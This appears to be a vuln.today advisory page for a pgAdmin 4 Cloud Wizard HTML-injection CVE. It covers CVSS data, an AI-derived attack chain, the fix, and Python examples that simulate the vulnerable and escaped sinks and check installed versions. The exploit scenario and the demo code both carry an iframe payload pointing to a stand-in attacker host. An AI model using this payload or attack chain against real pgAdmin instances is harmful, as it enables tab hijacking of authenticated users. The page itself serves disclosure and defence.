
pgAdmin 4 CVE-2026-12047

EUVD-2026-37967 | MEDIUM
Cross-site Scripting (XSS) (CWE-79)
Published 2026-06-18 · Vendor: PostgreSQL · GHSA-prff-6vwq-gf23
CVSS 4.0 base score 4.8 (Vendor: PostgreSQL)

Severity by source

Vendor (PostgreSQL), primary: 4.8 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

vuln.today AI: 3.5 LOW

Requires an authenticated session (PR:L), and the user must actively submit the crafted request (UI:R in the CVSS 3.1 vector, UI:A in CVSS 4.0); the impact is limited to low integrity, with no confidentiality or availability consequence.

CVSS 3.1: AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (PostgreSQL).

CVSS Vector (Vendor: PostgreSQL)

Base metrics from the vendor's CVSS 4.0 vector:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Attack Requirements (AT): None
Privileges Required (PR): Low
User Interaction (UI): Active
Vulnerable System Impact (VC/VI/VA): Confidentiality None, Integrity Low, Availability None
Subsequent System Impact (SC/SI/SA): None
Scope: not a CVSS 4.0 metric (shown as X; the CVSS 3.1 mapping has S:U)

Lifecycle Timeline (5 events)

Jun 19, 2026 00:34, vuln.today: source code evidence fetched
Jun 19, 2026 00:34, vuln.today: analysis generated
Jun 19, 2026 00:22, NVD: severity changed LOW -> MEDIUM
Jun 19, 2026 00:22, NVD: CVSS changed 3.5 (LOW) -> 4.8 (MEDIUM)
Jun 18, 2026 23:37, cve.org: CVE published, MEDIUM 4.8

Description (CVE.org)

HTML injection in pgAdmin 4's cloud deployment module. The verify_credentials, deploy, regions, and update-server endpoints under /rds/, /azure/, /google/, and the top-level /cloud/ blueprint propagated AWS / Azure / Google SDK exception text - and the related file-resolution and database-commit exception text - into the JSON response body (the info and errormsg fields) without HTML-encoding. The Cloud Wizard frontend rendered these strings through html-react-parser, so an attacker-influenced exception message embedded structural HTML directly into the wizard's DOM.

The reported entry point is /rds/verify_credentials/. An authenticated pgAdmin user submits a crafted access_key whose value contains an <iframe/src=...> payload; AWS STS rejects the credential with an IncompleteSignature exception whose text quotes the access_key verbatim; the pgAdmin backend forwards that text into the JSON info field; the Cloud Wizard's FormFooterMessage parses it as HTML. The browser fetches the iframe's src from an attacker-controlled host, and JavaScript executing inside the cross-origin iframe writes to parent.location, redirecting the victim's pgAdmin tab. Because the injection renders inside pgAdmin's own interface, X-Frame-Options and Content-Security-Policy frame-ancestors do not mitigate it. Baseline impact is self-targeted (the same user who supplied the payload sees the injection); escalation against other authenticated users requires an additional cross-site request-forgery primitive capable of submitting the malformed credential request with a valid X-pgA-CSRFToken in the victim's browser context.

The same unsanitised-error-into-JSON pattern was present across multiple sibling endpoints - Azure's check_cluster_name_availability, every Google endpoint that surfaces SDK errors (verification_ack, projects, regions, instance_types, database_versions, the verify_credentials path-resolution branches), the central /deploy endpoint that bubbles str(e) from deploy_on_rds / deploy_on_azure / deploy_on_google, and update_cloud_server which surfaces the str(e) from a failing db.session.commit - all of which are now covered.

Fix HTML-escapes every external/SDK exception string at the endpoint sink via a new shared sanitize_external_text helper (HTML escape with control-character strip), promoted out of the psycopg3 driver into web/pgadmin/utils/text_sanitize.py. The Cloud Wizard frontend additionally renders its FormFooterMessage in plain-text mode for backend-derived strings, so the value is never parsed as HTML even if a future sink forgets the escape.

This issue affects pgAdmin 4: from 6.6 before 9.16.
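The pattern the description covers, reduced to a runnable illustration. This is an added example written for this page, not pgAdmin's code: FakeSTSError, fake_verify_credentials, verify_credentials_vulnerable, verify_credentials_fixed, structural_tags and audit_response are constructed names, the exception wording is invented (it only preserves the property that matters, that the message quotes the submitted access key verbatim), and sanitize_external_text is a plausible reimplementation of what the description says the fix's helper does (HTML escape plus control-character strip), not the helper shipped in web/pgadmin/utils/text_sanitize.py. The frontend half of the fix (rendering FormFooterMessage in plain-text mode) is outside what this backend-side example shows.

```python
import html
import json
import re
from html.parser import HTMLParser

# Control characters other than tab, LF and CR are dropped.  Which characters
# the real helper strips is not stated on the page; this set is an assumption.
_CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f\x7f]")


def sanitize_external_text(text):
    """Neutralise text that originated outside the application (an SDK or
    driver exception, a filesystem error) before it is placed in a JSON field
    that a client may hand to an HTML parser.  Quotes are escaped too so the
    value stays inert inside an attribute as well as in element content."""
    cleaned = _CONTROL_CHARS.sub("", str(text))
    return html.escape(cleaned, quote=True)


class FakeSTSError(Exception):
    """Stand-in for an SDK exception whose message quotes caller input
    verbatim (constructed for this example; the wording is not AWS's)."""


def fake_verify_credentials(access_key, secret_key):
    """Constructed replacement for the STS call: every key is rejected with a
    message that echoes the submitted access key, which is the property that
    turns a credential field into an HTML injection vector."""
    raise FakeSTSError(
        "An error occurred (IncompleteSignature): "
        f"'{access_key}' not a valid key=value pair"
    )


def verify_credentials_vulnerable(form):
    """Pre-fix shape of the sink: str(e) goes straight into the 'info' field."""
    try:
        fake_verify_credentials(form["access_key"], form["secret_key"])
        return {"success": True, "info": "Credentials verified"}
    except Exception as e:  # catch-all mirrors the sink described above
        return {"success": False, "info": str(e)}


def verify_credentials_fixed(form):
    """Post-fix shape: the same sink, escaped at the point of emission."""
    try:
        fake_verify_credentials(form["access_key"], form["secret_key"])
        return {"success": True, "info": "Credentials verified"}
    except Exception as e:
        return {"success": False, "info": sanitize_external_text(e)}


class _TagCollector(HTMLParser):
    """Records every element an HTML parser would create from a string."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.tags.append(tag)


def structural_tags(text):
    """Tag names html.parser sees in text; an empty list means no elements
    would be created if the string were parsed as HTML."""
    parser = _TagCollector()
    parser.feed(text)
    parser.close()
    return parser.tags


def audit_response(body):
    """Map each 'info'/'errormsg' field that would create elements when parsed
    as HTML to the tag names found.  Accepts a JSON string or a dict, so it can
    be run over captured responses or used as an assertion in a test suite."""
    data = json.loads(body) if isinstance(body, str) else body
    findings = {}
    for field in ("info", "errormsg"):
        value = data.get(field)
        if isinstance(value, str):
            tags = structural_tags(value)
            if tags:
                findings[field] = tags
    return findings


if __name__ == "__main__":
    # Constructed request body; the access_key carries the payload from the
    # description, the secret is irrelevant because the fake call always fails.
    payload = {"access_key": "<iframe/src=https://attacker.example/>",
               "secret_key": "irrelevant"}
    print("vulnerable:", audit_response(verify_credentials_vulnerable(payload)))
    print("fixed:     ", audit_response(verify_credentials_fixed(payload)))
```

audit_response is the check worth keeping around after the upgrade: run it against every error-path response of the cloud endpoints and it flags any sink that still emits a string an HTML parser would turn into elements, independent of whether the frontend happens to parse it.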

Analysis (AI)

HTML injection in pgAdmin 4's Cloud Wizard (versions 6.6 through 9.15.x) allows authenticated users to embed arbitrary HTML into the tool's DOM by exploiting unescaped AWS, Azure, and Google Cloud SDK exception text propagated into JSON response fields and parsed by html-react-parser. The primary impact is self-targeted DOM manipulation - the authenticated user who submits the crafted payload is the one who sees it rendered - with escalation to cross-user exploitation requiring an additional CSRF primitive to forge a valid X-pgA-CSRFToken in a victim's browser. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

Recon: authenticate to pgAdmin as a low-privilege user.
Delivery: open the Cloud Wizard and place an HTML payload in a credential field.
Exploit: submit the crafted credential to /rds/verify_credentials/ (or the Azure/Google equivalent).
Install: the cloud provider SDK returns an error that quotes the payload verbatim.
C2: the pgAdmin backend serializes the unescaped error into the JSON response.
Execute: the Cloud Wizard renders the error via html-react-parser.
Impact: the injected iframe is instantiated in pgAdmin's DOM; script running in the attacker's cross-origin frame sets parent.location and redirects the victim's tab.

Vulnerability Assessment (AI)

Exploitation: Exploitation requires an authenticated pgAdmin 4 session (confirmed by CVSS PR:L) and active submission of a credential-verification request through the Cloud Wizard UI (confirmed by CVSS UI:A). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: The CVSS 4.0 score of 4.8 (Medium) with vector AV:N/AC:L/AT:N/PR:L/UI:A accurately reflects the constrained real-world risk: the attack is network-reachable and low-complexity but requires an authenticated session (PR:L) and active user interaction (UI:A). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario: An authenticated pgAdmin user opens the Cloud Wizard and submits a crafted AWS access key value such as '<iframe/src=https://attacker.example/>' to the /rds/verify_credentials/ endpoint. AWS STS returns an IncompleteSignature error quoting the access key verbatim; pgAdmin embeds the unescaped string into the JSON info field; and the Cloud Wizard's FormFooterMessage passes it through html-react-parser, instantiating the iframe in the DOM. …
Remediation: Upgrade to pgAdmin 4 version 9.16 or later, which applies HTML-escaping at all affected endpoint sinks via the new sanitize_external_text helper and additionally hardens the Cloud Wizard frontend to render backend-derived strings in plain-text mode. … Detailed patch versions, workarounds, and compensating controls in full report.
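A small inventory check against the affected range the advisory states (from 6.6 before 9.16), added here as an example and not taken from pgAdmin or vuln.today. The function names, the version-string tolerance (leading "v", trailing suffix after the numeric part) and the sample inventory are this example's own assumptions; where your version strings come from (package manager, container tag, the pgAdmin About dialog) is not covered by the page.

```python
import re

AFFECTED_FROM = (6, 6)   # first affected release named in the advisory
FIXED_IN = (9, 16)       # first release carrying the fix


def parse_version(text):
    """'9.15.1' -> (9, 15, 1).  A leading 'v' and anything after the numeric
    part (e.g. '-dev') are ignored; other shapes are rejected, not guessed."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def is_affected(version):
    """True when AFFECTED_FROM <= version < FIXED_IN.  Tuple comparison copes
    with differing lengths: (9, 15, 1) < (9, 16), while (9, 16, 0) >= (9, 16)."""
    return AFFECTED_FROM <= parse_version(version) < FIXED_IN


def needs_upgrade(inventory):
    """Given {host: version}, return the hosts still on an affected release,
    sorted so repeated runs produce a stable report."""
    return sorted(host for host, ver in inventory.items() if is_affected(ver))


if __name__ == "__main__":
    # Constructed inventory for the demo, not real hosts.
    sample = {"pgadmin-prod": "9.15.1", "pgadmin-dev": "9.16",
              "pgadmin-legacy": "7.8", "pgadmin-old": "6.5.2"}
    print(needs_upgrade(sample))
```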



CVE-2026-12047 vulnerability details – vuln.today
